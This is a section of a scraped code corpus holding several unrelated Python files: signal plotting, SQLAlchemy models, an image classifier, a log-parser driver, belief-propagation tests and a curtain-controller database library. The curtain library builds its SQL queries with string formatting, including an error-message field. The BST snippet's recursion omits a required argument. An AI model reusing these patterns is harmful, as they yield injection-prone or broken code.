app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"66364635","text":"import thinkdsp\r\nimport matplotlib.pyplot as plt\r\nfrom winsound import PlaySound\r\nimport numpy as np\r\nsignal_tri = thinkdsp.TriangleSignal(440)\r\nplt.subplot(411)\r\nsignal_tri.plot()\r\nwave = signal_tri.make_wave(duration=0.01, framerate=10000)\r\nspectrum = wave.make_spectrum()\r\nplt.subplot(412)\r\nspectrum.plot()\r\nprint(spectrum.hs[0])\r\nprint(np.angle(spectrum.hs[0]))\r\nprint(np.abs(spectrum.hs[0]))\r\nspectrum.hs[0] = 100\r\nprint(spectrum.hs[0])\r\nprint(type(spectrum.hs[0]))\r\nwave = spectrum.make_wave()\r\nplt.subplot(413)\r\nwave.plot()\r\nspectrum = wave.make_spectrum()\r\nplt.subplot(414)\r\nspectrum.plot()\r\nplt.show()\r\n\r\n","sub_path":".vscode/20210609/20210609-3.py","file_name":"20210609-3.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"379720891","text":"import const\n\n\nclass User(object):\n def __init__(self, id, username=None, first_name=None, last_name=None):\n self.id = id\n self.username = username\n self.first_name = first_name\n self.last_name = last_name\n self.keywords = set()\n self.notifications = set()\n self.menu_state = const.START\n\n def __str__(self):\n return \"id=[{}]\".format(\n self.id\n )\n\n def add_keywords(self, keywords):\n for kw in keywords:\n self.keywords.add(kw)\n\n def remove_keywords(self, keywords):\n for kw in keywords:\n if kw in self.keywords:\n self.keywords.remove(kw)\n\n def add_notification(self, notification):\n exists = False\n for n in self.notifications:\n if n == notification:\n exists = True\n if not exists:\n self.notifications.add(notification)\n # print(\"Notification is added for {} exist with {} {}\".format(self.id, notification.text.encode(), notification.date.encode()))\n","sub_path":"src/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"413463493","text":"from sys import argv\r\nfrom util import convertDictToList, flatten, sortBySecond, stringify\r\n\r\nplayer = argv[1]\r\nk = argv[2]\r\nvariant_stats = {}\r\n\r\nplayer_data = open('output/individual_stats/%s.csv'%player, encoding='utf-8').readlines()\r\nplayer_data = player_data[-1:0:-1]\r\n\r\nfreq = {}\r\n\r\nfor row in player_data:\r\n if row != '':\r\n game_id,num_players,score,variant,*current_players=row.strip().split(',')\r\n if num_players != k:\r\n for teammate in current_players:\r\n if teammate == player:\r\n continue\r\n if teammate not in freq:\r\n freq[teammate] = 0\r\n freq[teammate] += 1\r\n\r\nfreq = convertDictToList(freq)\r\nfreq = sortBySecond(freq)\r\n\r\noutput = open('output/frequent_teammates/frequent_teammates_excluding_%s_players_%s.csv'%(k,player), 'w')\r\noutput.write('\\n'.join([','.join(stringify(flatten(i))) for i in freq]))\r\noutput.close()","sub_path":"frequent_teammates_excluding_k_players.py","file_name":"frequent_teammates_excluding_k_players.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"258707505","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nfrom decimal import Decimal\n\nfrom sqlalchemy import (Column, Text, BigInteger, DateTime, ForeignKey,\n Boolean, Numeric, Integer, inspect)\nfrom sqlalchemy.dialects.postgresql import JSON\nfrom sqlalchemy.sql import functions\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy.orm.attributes import InstrumentedAttribute\nfrom sqlalchemy.ext.declarative import declarative_base\n\nfrom swic.app import app\n\nBase = declarative_base()\n\n\nclass BaseORM(Base):\n __abstract__ = True\n\n def __init__(self, **kwargs):\n for key, value in kwargs.iteritems():\n setattr(self, key, value)\n\n def dict(self):\n retval = {}\n klasses = list(self.__class__.__mro__)\n klasses.reverse()\n for klass in klasses:\n for attr in klass.__dict__:\n if isinstance(getattr(klass, attr), InstrumentedAttribute):\n # Only allow JSON serializable values\n value = getattr(self, attr)\n if type(value) in [unicode, str, int, float, bool]:\n retval[attr] = value\n if type(value) == datetime:\n retval[attr] = value.isoformat()\n if isinstance(value, Decimal):\n retval[attr] = value\n return retval\n\n def append(self, other, **kwargs):\n \"\"\"Appends N-to-N related objects\"\"\"\n self_attr = self.__class__.__name__.lower().replace('swic', '')\n other_attr = other.__class__.__name__.lower().replace('swic', '')\n keys = {\n self_attr: self,\n other_attr: other,\n }\n\n store = inspect(self).session\n Mapper = getattr(self.__class__, other_attr + '_map').prop.argument()\n mapper = Mapper.get_or_create(store, keys, **kwargs)\n return getattr(self, other_attr + '_map').append(mapper)\n\n\n @classmethod\n def get_or_create(cls, store, query, **kwargs):\n # Auto assign query parameters when creating/updating\n kwargs.update(query)\n\n obj = store.query(cls).filter_by(**query).first()\n if obj is not None:\n for key, value in kwargs.iteritems():\n setattr(obj, key, value)\n return obj\n obj = cls(**kwargs)\n store.add(obj)\n return obj\n\n\nclass SWICUserVideoMap(BaseORM):\n \"\"\"Association between SWICUser and Video\"\"\"\n\n __tablename__ = 'swic_user_video_map'\n\n video_id = Column(BigInteger,\n ForeignKey('video.id'),\n primary_key=True)\n video = relationship('Video', back_populates='user_map')\n\n swic_user_id = Column(BigInteger,\n ForeignKey('swic_user.id'),\n primary_key=True)\n user = relationship('SWICUser', back_populates='video_map')\n\n created_on = Column(DateTime, default=datetime.now)\n\n ip = Column(Text)\n\n\nclass Video(BaseORM):\n \"\"\"A video that was requested\"\"\"\n\n __tablename__ = 'video'\n\n #: Synthetic id\n id = Column(BigInteger, primary_key=True)\n\n #: The video request's Firebase code\n code = Column(Text)\n\n #: The video request's creation date\n created_on = Column(DateTime, default=datetime.now)\n\n #: Whether the video comes from a donator or not\n donator = Column(Boolean, default=False)\n\n #: How much time should we slow the original video to render\n rendering_slowness = Column(Numeric, default=20)\n\n #: The video request's rendering date\n rendered_on = Column(DateTime)\n\n #: Has the video rendering failed?\n failed = Column(Boolean, default=False)\n\n #: The video's rendering resolution\n resolution_width = Column(Integer, default=1280)\n resolution_height = Column(Integer, default=720)\n\n #: User mapping\n user_map = relationship('SWICUserVideoMap', back_populates=\"video\")\n\n #\n # Static\n #\n\n @classmethod\n def get_queue(cls, store):\n query = store.find(cls, rendered_on=None)\n return query.order_by(~cls.donator, cls.created_on)\n\n @classmethod\n def rendering_eta(cls):\n rendering_seconds = app.config['RENDERING_SECONDS']\n video_seconds = app.config['VIDEO_SECONDS']\n return (cls.rendering_slowness * video_seconds) + rendering_seconds\n\n @classmethod\n def get_eta(cls, store):\n attr = functions.sum(Video.rendering_eta())\n return store.find(attr).filter(cls.rendered_on == None).one()[0] or 0\n\n #\n # Properties\n #\n\n @property\n def rendering_time(self):\n rendering_seconds = app.config['RENDERING_SECONDS']\n video_seconds = app.config['VIDEO_SECONDS']\n return (self.rendering_slowness * video_seconds) + rendering_seconds\n\n @property\n def eta(self):\n store = inspect(self).session\n attr = functions.sum(Video.rendering_eta())\n\n if self.donator:\n filter = Video.donator & (Video.created_on <= self.created_on)\n else:\n filter = Video.donator | (Video.created_on <= self.created_on)\n query = store.query(attr).filter(Video.rendered_on == None)\n return query.filter(filter).one()[0] or 0\n\n #\n # Public\n #\n\n def dict(self, eta=True, users=False):\n retval = super(Video, self).dict()\n retval['rendering_time'] = self.rendering_time\n if eta:\n retval['eta'] = self.eta\n if users:\n retval['users'] = [m.user.dict() for m in self.user_map]\n return retval\n\n\nclass SWICUser(BaseORM):\n \"\"\"Someone who requested a video\"\"\"\n\n __tablename__ = 'swic_user'\n\n #: Synthetic id\n id = Column(BigInteger, primary_key=True)\n\n #: The user's creation date\n created_on = Column(DateTime, default=datetime.now)\n\n #: The user's e-mail\n email = Column(Text)\n\n #: Video mapping\n video_map = relationship('SWICUserVideoMap', back_populates=\"user\")\n\n\nclass Event(BaseORM):\n \"\"\"Generic event table\"\"\"\n\n types = {\n 'SERVER_RESTARTED': 'server-restarted',\n 'DATABASE_CREATED': 'database-created',\n 'VIDEO_STATUS_CHECK': 'video-status-check',\n }\n\n __tablename__ = 'event'\n\n #: Synthetic id\n id = Column(BigInteger, primary_key=True)\n\n #: The event's creation date\n created_on = Column(DateTime, default=datetime.now)\n\n #: The event's type\n type = Column(Text)\n\n #: The event's additional data\n data = Column(JSON)\n\n def __init__(self, type, data=None):\n self.type = self.types[type]\n self.data = data\n","sub_path":"swic/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"630595411","text":"import argparse\n\nparser = argparse.ArgumentParser('Classify food images')\nparser.add_argument('--dir', type=str, required=True, help='Directory of images')\nparser.add_argument('--model', type=str, required=True, help='Path to model')\n\nargs = parser.parse_args()\n\nimage_DIR = args.dir\nmodel_DIR = args.model\n\nimport os \nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.models import load_model\n\nfiles_in_dir = os.listdir(image_DIR)\nimage_formats = ['.jpg', '.jpeg', '.png', 'JPEG', '.PNG', '.JPG']\n\nprint('Reading images...')\n\nimage_paths = []\nfor file in files_in_dir:\n for image_format in image_formats:\n if image_format in file:\n image_paths.append(image_DIR + '/' + file)\n \nX = []\nfor image in image_paths:\n img = plt.imread(image)\n X.append(img)\nX = np.array(X)\nX = X/255\n\nprint('Loading model...')\n\nmodel = load_model(model_DIR)\n\nprint('Running model on images...')\n\ny = model.predict(X)\n\nprint('Images classified...')\n\nthreshold = 0.37\n\ny_copy = np.copy(y)\ny_copy[y_copy < threshold] = 0\ny_copy[y_copy >= threshold] = 1\n\nclasses_ = np.array(['apple', 'banana', 'bread', 'bruscitt', 'cake', 'carrot', 'cutlet',\n 'fennel_gratin', 'fillet_fish', 'fries', 'green_beans',\n 'lasagna_bolognese', 'meat', 'orange', 'pasta', 'pears', 'peas',\n 'pizza', 'pizzoccheri', 'potatoes', 'pudding', 'rice', 'salad',\n 'salmon', 'salty_cake', 'savory_pie', 'scallops', 'soup',\n 'spinach', 'squid_stew', 'tangerine', 'wet_zucchini', 'yogurt'])\n\nclassified_labels = []\nfor i in range(len(y_copy)):\n classified_labels.append(str(classes_[(y_copy == 1)[i]]))\n\nprint('Saving Results...')\n \nresult = pd.DataFrame(classified_labels).rename(columns={0:'labels'})\n\nimage_names = pd.Series(image_paths, name='image').apply(lambda x:x.strip(image_DIR).strip('.jpepngJPEPNG'))\n\nresult = pd.concat([image_names, result], axis=1)\n\nresult.to_csv(image_DIR + '/result.csv', index=False)\n\nprint('Results saved at {}'.format(image_DIR + '/result.csv'))","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"411298070","text":"from model import Node,Drain,buildSampleDrain\n# from optimizer import Optimizer\nfrom optimizer import Optimizer\nfrom plotter import createPlot\nfrom partition import Preprocess\nimport pandas as pd\nimport os\n\n\ndef parse_log_data():\n rex = ['blk_(|-)[0-9]+', '(/|)([0-9]+\\.){3}[0-9]+(:[0-9]+|)(:|)']\n removeCol = [0,1,2]\n myParser = Drain(rex=rex,removeCol=removeCol)\n # myParser.fit(inputFile='./sample.log',outputFile='test.csv')\n myParser.fit(isReconstruct=True)\n return myParser\n # myParser.save()\n\ndef printClusters(logClusters):\n for logCluster in logClusters:\n print(\"eventId: \"+str(logCluster.eventId)+\" template: \"+' '.join(logCluster.logTemplate),end=' ')\n print(\"parentNode: \" ,end=' ')\n for node in logCluster.parentNode:\n print(node.token,end=' ')\n print()\n\ndef optimize_by_seq_dist():\n logPath = os.path.join(os.path.abspath(''), 'sample.log')\n drain = buildSampleDrain(logPath)\n drain.save()\n logClusters = drain.logClusters\n printClusters(logClusters)\n opt = Optimizer()\n opt.modify(method = 'seq_dist',tree = drain.prefixTree,drain=drain,st = 0.7)\n logClusters = drain.logClusters\n printClusters(logClusters)\n root = drain.copy()\n createPlot(root)\n\ndef optimize_by_merge_sub_tree():\n\n drain = parse_log_data()\n # logPath = os.path.join(os.path.abspath(''), 'sample.log')\n # drain = buildSampleDrain(logPath)\n # createPlot(drain)\n opt = Optimizer()\n logClusters = drain.logClusters\n print('优化前')\n printClusters(logClusters)\n opt.modify(method='merge_sub_tree', tree=drain.prefixTree,drain = drain)\n logClusters = drain.logClusters\n print('合并子树优化')\n printClusters(logClusters)\n # createPlot(drain)\n opt.modify(method = 'seq_dist',tree = drain.prefixTree,drain=drain,st = 0.8)\n logClusters = drain.logClusters\n print('合并聚类优化')\n printClusters(logClusters)\n drain.save()\n return drain\n\ndef optimize_by_tfidf():\n logPath = os.path.join(os.path.abspath(''), 'sample.log')\n drain = buildSampleDrain(logPath)\n logClusters = drain.logClusters\n printClusters(logClusters)\n opt = Optimizer()\n opt.modify(method = 'tfidf',tree = drain.prefixTree,drain=drain,st = 0.6)\n logClusters = drain.logClusters\n print( )\n printClusters(logClusters)\n root = drain.copy()\n createPlot(root)\n\n\ndef draw_tree():\n rex = ['blk_(|-)[0-9]+', '(/|)([0-9]+\\.){3}[0-9]+(:[0-9]+|)(:|)']\n removeCol = [0, 1, 2]\n myParser = Drain(rex=rex, depth=3, removeCol=removeCol)\n root = myParser.load('./results/prefixTree.pkl')\n createPlot(root)\n\nif __name__ == \"__main__\":\n # draw_tree()\n drain = parse_log_data()\n drain.save()\n # preprocess = Preprocess('./results/','./data/', \"log_item_to_label.csv\", 'data_instances_hdfs.csv', 'anormaly_label.csv', 'normal.csv', 'abnormaly.csv')\n # blockId_to_logs = preprocess.partition_by_file()\n # data_df = pd.read_csv(\"./results/data_instances_hdfs.csv\", index_col=0,engine='c', na_filter=False, memory_map=True)\n # preprocess.map_log_seq_to_label(data_df)","sub_path":"end_to_end/drain/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"162285619","text":"\"\"\"\nFind the k largest elements in a BST\n\nA BST is a sorted data structure which suggests that it should be possible tofind\nthe k largest keys easily\n\nThis is reverse inorder and you sort\nThis is easy to do with a closure\n\"\"\"\n\nk_ = 0\nres_ = []\ndef largest_k(r, k):\n global k_\n if not r:\n return\n largest_k(r.right)\n if k_ < k:\n res_.append(r)\n k_ += 1\n else:\n return\n largest_k(r.left)\n\n\"\"\"\nLESSON: When you use a data structure, use its attributes like size() to do\nthe accounting for you\n\ntemplate \nvoid find_k_largest_in_BST_helper(const shared_ptr> &r,\n const int &k, vector &k_elements) {\n // perform reverse inorder traversal\n if (r && k_elements.size() < k) {\n find_k_largest_in_BST_helper(r.right, k, k_elements);\n if (k_elements.size() < k) {\n k_elements.emplace_back(r->data);\n find_k_largest_in_BST_helper(r->left, k, k_elements);\n }\n }\n}\n\ntemplate \nvector find_k_largest_in_BST(const shared_ptr> &root,\n const int &k) {\n vector k_elements;\n find_k_largest_in_BST_helper(root, k, k_elements);\n return k_elements;\n}\n\"\"\"","sub_path":"interview/elementsofpi/ch14/14.11.py","file_name":"14.11.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"330464073","text":"\"\"\"Test class for matrix implementation of tree-reweighted belief propagator\"\"\"\nimport unittest\nfrom mrftools import *\nimport numpy as np\n\n\nclass TestMatrixTreeBeliefPropagator(unittest.TestCase):\n \"\"\"Test class for matrix implementation of tree-reweighted belief propagator\"\"\"\n def create_chain_model(self):\n \"\"\"Create chain-structured MRF with different variable cardinalities.\"\"\"\n mn = MarkovNet()\n\n np.random.seed(1)\n\n k = [4, 3, 6, 2, 5]\n\n mn.set_unary_factor(0, np.random.randn(k[0]))\n mn.set_unary_factor(1, np.random.randn(k[1]))\n mn.set_unary_factor(2, np.random.randn(k[2]))\n mn.set_unary_factor(3, np.random.randn(k[3]))\n\n factor4 = np.random.randn(k[4])\n factor4[2] = -float('inf')\n\n mn.set_unary_factor(4, factor4)\n\n mn.set_edge_factor((0, 1), np.random.randn(k[0], k[1]))\n mn.set_edge_factor((1, 2), np.random.randn(k[1], k[2]))\n mn.set_edge_factor((2, 3), np.random.randn(k[2], k[3]))\n mn.set_edge_factor((3, 4), np.random.randn(k[3], k[4]))\n mn.create_matrices()\n\n return mn\n\n def create_loop_model(self):\n \"\"\"Create loop-structured MRF with different variable cardinalities.\"\"\"\n mn = self.create_chain_model()\n\n k = [4, 3, 6, 2, 5]\n\n mn.set_edge_factor((3, 0), np.random.randn(k[3], k[0]))\n mn.create_matrices()\n return mn\n\n def test_comparison_to_slow_trbp(self):\n \"\"\"Test that matrix TRBP infers the same marginals as loop-based TRBP\"\"\"\n mn = self.create_loop_model()\n\n probs = {(0, 1): 0.75, (1, 2): 0.75, (2, 3): 0.75, (0, 3): 0.75, (3, 4): 1.0}\n\n trbp_mat = MatrixTRBeliefPropagator(mn, probs)\n trbp_mat.infer(display='final')\n trbp_mat.load_beliefs()\n\n trbp = TreeReweightedBeliefPropagator(mn, probs)\n trbp.infer(display='final')\n trbp.compute_pairwise_beliefs()\n trbp.compute_beliefs()\n\n for i in mn.variables:\n print (\"Slow TRBP unary marginal of %d: %s\" % (i, repr(np.exp(trbp.var_beliefs[i]))))\n print (\"Matrix TRBP unary marginal of %d: %s\" % (i, repr(np.exp(trbp_mat.var_beliefs[i]))))\n assert np.allclose(np.exp(trbp.var_beliefs[i]), np.exp(trbp_mat.var_beliefs[i])), \"unary beliefs don't match\"\n\n print (\"Slow TRBP pairwise marginal: \" + repr(np.exp(trbp.pair_beliefs[(0, 1)])))\n print (\"Matrix TRBP pairwise marginal: \" + repr(np.exp(trbp_mat.pair_beliefs[(0, 1)])))\n\n assert np.allclose(trbp.pair_beliefs[(0, 1)], trbp_mat.pair_beliefs[(0, 1)]), \"Pair beliefs don't match: \" + \\\n \"\\nTRBP:\" + repr(np.exp(trbp.pair_beliefs[(0, 1)])) + \"\\nMatTRBP:\" + repr(np.exp(trbp_mat.pair_beliefs[(0, 1)]))\n\n print (\"TRBP matrix energy functional: %f\" % trbp_mat.compute_energy_functional())\n print (\"TRBP slow energy functional: %f\" % trbp.compute_energy_functional())\n\n assert np.allclose(trbp_mat.compute_energy_functional(), trbp.compute_energy_functional()), \\\n \"Energy functional is not exact. Slow TRBP: %f, Matrix TRBP: %f\" % (trbp.compute_energy_functional(),\n trbp_mat.compute_energy_functional())\n\n def test_tree_structured_model(self):\n \"\"\"Test that TRBP infers the true marginals on tree-structured MRF.\"\"\"\n mn = MarkovNet()\n\n # np.random.seed(1)\n\n k = [4, 3, 6, 2]\n # k = [4, 4, 4, 4]\n\n mn.set_unary_factor(0, np.random.randn(k[0]))\n mn.set_unary_factor(1, np.random.randn(k[1]))\n mn.set_unary_factor(2, np.random.randn(k[2]))\n mn.set_unary_factor(3, np.random.randn(k[3]))\n\n mn.set_edge_factor((0, 1), np.random.randn(k[0], k[1]))\n mn.set_edge_factor((1, 2), np.random.randn(k[1], k[2]))\n mn.set_edge_factor((3, 2), np.random.randn(k[3], k[2]))\n\n print(\"Neighbors of 0: \" + repr(mn.get_neighbors(0)))\n print(\"Neighbors of 1: \" + repr(mn.get_neighbors(1)))\n\n edge_probabilities = dict()\n\n for edge in mn.edge_potentials:\n edge_probabilities[edge] = 1 # BP\n\n trbp = MatrixTRBeliefPropagator(mn, edge_probabilities)\n\n trbp.infer(display='full')\n trbp.load_beliefs()\n\n trbp.compute_pairwise_beliefs()\n\n bf = BruteForce(mn)\n\n for i in range(2):\n print (\"Brute force unary marginal of %d: %s\" % (i, repr(bf.unary_marginal(i))))\n print (\"TRBP unary marginal of %d: %s\" % (i, repr(np.exp(trbp.var_beliefs[i]))))\n assert np.allclose(bf.unary_marginal(i), np.exp(trbp.var_beliefs[i])), \"TRBP not close to true unary\"\n\n print (\"Brute force pairwise marginal: \" + repr(bf.pairwise_marginal(0, 1)))\n print (\"TRBP pairwise marginal: \" + repr(np.exp(trbp.pair_beliefs[(0, 1)])))\n\n assert np.allclose(bf.pairwise_marginal(0, 1), np.exp(trbp.pair_beliefs[(0, 1)])), \\\n \"TRBP not close to pair marginal\"\n\n print (\"Tree Bethe energy functional: %f\" % trbp.compute_energy_functional())\n print (\"Brute force log partition function: %f\" % np.log(bf.compute_z()))\n\n assert np.allclose(trbp.compute_energy_functional(), np.log(bf.compute_z()))\n\n def test_upper_bound(self):\n \"\"\"Test that TRBP provides an upper bound on the true log-partition function.\"\"\"\n trials = 5\n\n tr_diff = np.zeros(trials)\n bp_diff = np.zeros(trials)\n\n for trial in range(trials):\n\n mn = MarkovNet()\n\n width = 3\n height = 3\n\n k = 2\n\n for x in range(width):\n for y in range(height):\n mn.set_unary_factor((x, y), np.random.random(k))\n\n for x in range(width - 1):\n for y in range(height - 1):\n mn.set_edge_factor(((x, y), (x + 1, y)), np.random.random((k, k)))\n mn.set_edge_factor(((y, x), (y, x + 1)), np.random.random((k, k)))\n\n bf = BruteForce(mn)\n\n edge_probabilities = dict()\n\n for edge in mn.edge_potentials:\n edge_probabilities[edge] = 0.5\n\n interior_prob = 0.5\n border_prob = 0.75\n\n for x in range(width):\n edge_probabilities[(x, 0)] = interior_prob\n edge_probabilities[(x, height - 1)] = interior_prob\n\n for y in range(height):\n edge_probabilities[(0, y)] = border_prob\n edge_probabilities[(width - 1, y)] = border_prob\n\n trbp = MatrixTRBeliefPropagator(mn, edge_probabilities)\n trbp.infer(display='off')\n\n trbp_z = trbp.compute_energy_functional()\n true_z = np.log(bf.compute_z())\n\n print(\"Tree Bethe energy functional: %f\" % trbp_z)\n print(\"Brute force log partition function: %f\" % true_z)\n\n print(\"Is the TRBP energy functional an upper bound? %r\" %\n (trbp_z >= true_z))\n assert trbp_z >= true_z, \"TRBP energy functional was lower than true log partition\"\n\n tr_diff[trial] = trbp_z - true_z\n\n print(\"Difference range between variational Z and truth:\")\n print(\"TRBP: %f to %f\" % (min(tr_diff[:trial + 1]), max(tr_diff[:trial + 1])))\n print(\"Average error. TRBP: %f\" % np.mean(np.abs(tr_diff[:trial + 1])))\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_matrix_trbp.py","file_name":"test_matrix_trbp.py","file_ext":"py","file_size_in_byte":7447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"587755923","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n__author__ = \"MPZinke\"\n\n###########################################################################\n#\n#\tcreated by: MPZinke\n#\ton ..\n#\n#\tDESCRIPTION: Function library to pull from curtain.sql to get/set values & events.\n#\t\t\t\t\t\t`curtain_details` table should contain 1 entry for storing primary curtain\n#\t\t\t\t\t\tdata.\n#\tBUGS:\n#\tFUTURE:\n#\n###########################################################################\n\nfrom Definitions import *\nimport ErrorWriter\n\n\n# —————————————————— GETTERS ——————————————————\n\ndef current_position(cursor):\n\tquery = (\t\"SELECT `curtain_position` FROM `curtain_details` \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query)\n\treturn cursor._rows[0][0]\n\n\n# get number of stepper motor steps from one side of the curtain to the other (open vs closed)\ndef curtain_length(cursor):\n\tquery = (\t\"SELECT `curtain_length` FROM `curtain_details` \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query)\n\treturn cursor._rows[0][0]\n\n\n# bool for if the curtain's desired position is current catalogued position \ndef desire_position_does_not_equal_current(cursor, desired):\n\tquery = (\t\"SELECT `curtain_position`FROM `curtain_details` \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query)\n\tcurrent = cursor._rows[0][0]\n\tif not current: return 5 < desired\n\treturn 5 < (abs(current - desired) / current)\n\n\ndef direction(cursor):\n\tquery = (\t\"SELECT `curtain_direction` FROM `curtain_details` \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query)\n\treturn cursor._rows[0][0]\n\n\n# BOOL/INT: check for practical purposes if an event (same position) is already set\ndef event_set_at_approximate_time(cursor, event, time):\n\tfrom datetime import timedelta\n\ttime_lower_bound = time - timedelta(seconds=SAME_EVENT_TIME_DIFFERENCE)\n\ttime_upper_bound = time + timedelta(seconds=SAME_EVENT_TIME_DIFFERENCE)\n\tquery = (\t\"SELECT * FROM `events` \\\n\t\t\t\tWHERE `event_time` > '%s' AND `event_time` < '%s' \\\n\t\t\t\tAND `event_position` = '%d';\")\n\tcursor.execute(query % (\ttime_lower_bound,\n\t\t\t\t\t\t\t\ttime_upper_bound,\n\t\t\t\t\t\t\t\tevent))\n\treturn cursor.rowcount\n\n\n# —————————————————— OPTIONS ——————————————————\n\ndef adafruit_feed(cursor):\n\tquery = (\t\"SELECT `adafruit_feed` FROM `options` \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query)\n\treturn cursor._rows[0][0]\n\n\ndef auto_calibration(cursor):\n\tquery = (\t\"SELECT `auto_calibration` FROM `options` \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query)\n\treturn cursor._rows[0][0]\n\n\ndef event_predictor(cursor):\n\tquery = (\t\"SELECT `event_predictor` FROM `options` \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query)\n\treturn cursor._rows[0][0]\n\n\ndef sunrise_open(cursor):\n\tquery = (\t\"SELECT `sunrise_open` FROM `options` \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query)\n\treturn cursor._rows[0][0]\n\n\ndef sunset_close(cursor):\n\tquery = (\t\"SELECT `sunset_close` FROM `options` \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query)\n\treturn cursor._rows[0][0]\n\n\n# —————————————————— EVENTS ——————————————————\n\ndef all_non_activated_events(cursor):\n\tquery = (\t\"SELECT `event_key`, `event_position` FROM `events` \\\n\t\t\t\tWHERE `event_time` < CURRENT_TIMESTAMP \\\n\t\t\t\tAND `event_activated` = FALSE \\\n\t\t\t\tORDER BY `event_time` DESC;\")\n\tcursor.execute(query)\n\treturn cursor._rows\n\n\ndef events_for_previous_weeks(cursor):\n\tfrom datetime import datetime, timedelta\n\toldest_desired_date = datetime.now() - timedelta(weeks=CLUSTER_SPAN)\n\tquery = (\t\"SELECT `event_position`, `event_time` FROM `events` \\\n\t\t\t\tWHERE `event_time` > '%s' AND `event_time` < CURRENT_TIMESTAMP\")\n\tcursor.execute(query % (str(oldest_desired_date)))\n\treturn cursor._rows\n\n\ndef newest_non_activated_event(cursor):\n\tquery = (\t\"SELECT `event_key`, `event_position` FROM `events` \\\n\t\t\t\tWHERE `event_time` < CURRENT_TIMESTAMP \\\n\t\t\t\tAND `event_activated` = FALSE \\\n\t\t\t\tORDER BY `event_time` DESC LIMIT 1;\")\n\tcursor.execute(query)\n\treturn cursor._rows[0]\n\n\ndef oldest_non_activated_event(cursor):\n\tquery = (\t\"SELECT `event_key`, `event_position` FROM `events` \\\n\t\t\t\tWHERE `event_time` < CURRENT_TIMESTAMP \\\n\t\t\t\tAND `event_activated` = FALSE \\\n\t\t\t\tORDER BY `event_time` ASC LIMIT 1;\")\n\tcursor.execute(query)\n\treturn cursor._rows[0]\n\n\n# —————————————————— SETTERS ——————————————————\n\n# move to DBFunctions.py\ndef add_event(cnx, cursor, event_position, time):\n\tquery = (\t\"INSERT INTO `events` \\\n\t\t\t\t(`event_position`, `event_activated`, `event_time`) VALUES \\\n\t\t\t\t('%d', FALSE, '%s');\")\n\tcursor.execute(query % (event_position, time.strftime(DATETIME_STRING_FORMAT)))\n\treturn cnx.commit()\n\n\ndef mark_event_as_activated(cnx, cursor, event_key):\n\tquery = (\t\"UPDATE `events` SET `event_activated` = TRUE \\\n\t\t\t\tWHERE `event_key` = '%d';\")\n\tcursor.execute(query % (event_key))\n\treturn cnx.commit()\n\n\n# assign the curtain's current position to `curtain_details`.`curtain_position` in DB\ndef new_position(cnx, cursor, position_in_steps):\n\tquery = (\t\"UPDATE `curtain_details` SET `curtain_position` = '%d' \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query % (position_in_steps))\n\treturn cnx.commit()\n\n\ndef set_current_position(cnx, cursor, position):\n\tquery = (\t\"UPDATE `curtain_details` SET `curtain_position` = '%d' \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query % (position))\n\treturn cnx.commit() \n\n\ndef set_curtain_length(cnx, cursor, total_steps):\n\tquery = (\t\"UPDATE `curtain_details` SET `curtain_length` = '%d' \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query % (total_steps))\n\treturn cnx.commit() \n\n\ndef set_direction_switch(cnx, cursor, switch_value):\n\tquery = (\t\"UPDATE `curtain_details` SET `curtain_direction` = '%d' \\\n\t\t\t\tWHERE `pseudo_key` = '1';\")\n\tcursor.execute(query % (switch_value))\n\treturn cnx.commit() \n\n\ndef write_curtain_error(cnx, cursor, current, desired, error, module=None):\n\tif not module:\n\t\timport traceback\n\t\tmodule = traceback.format_exc().split(\"\\n\")[-4].strip()\n\n\t# change delimiter if exists\n\terror_message = str(error).replace(DELIMITER, ',' if ',' is not DELIMITER else ' ')\n\tquery = (\t\"INSERT INTO `error_log` \\\n\t\t\t\t(`curtain_position`, `event_position`, `error`, `path`) VALUES \\\n\t\t\t\t('%d', '%d', '%s', '%s');\")\n\tcursor.execute(query % (current, desired, error, module))\n\treturn cnx.commit()\n\n\n# ———————————————— CONNECTION —————————————————\n# 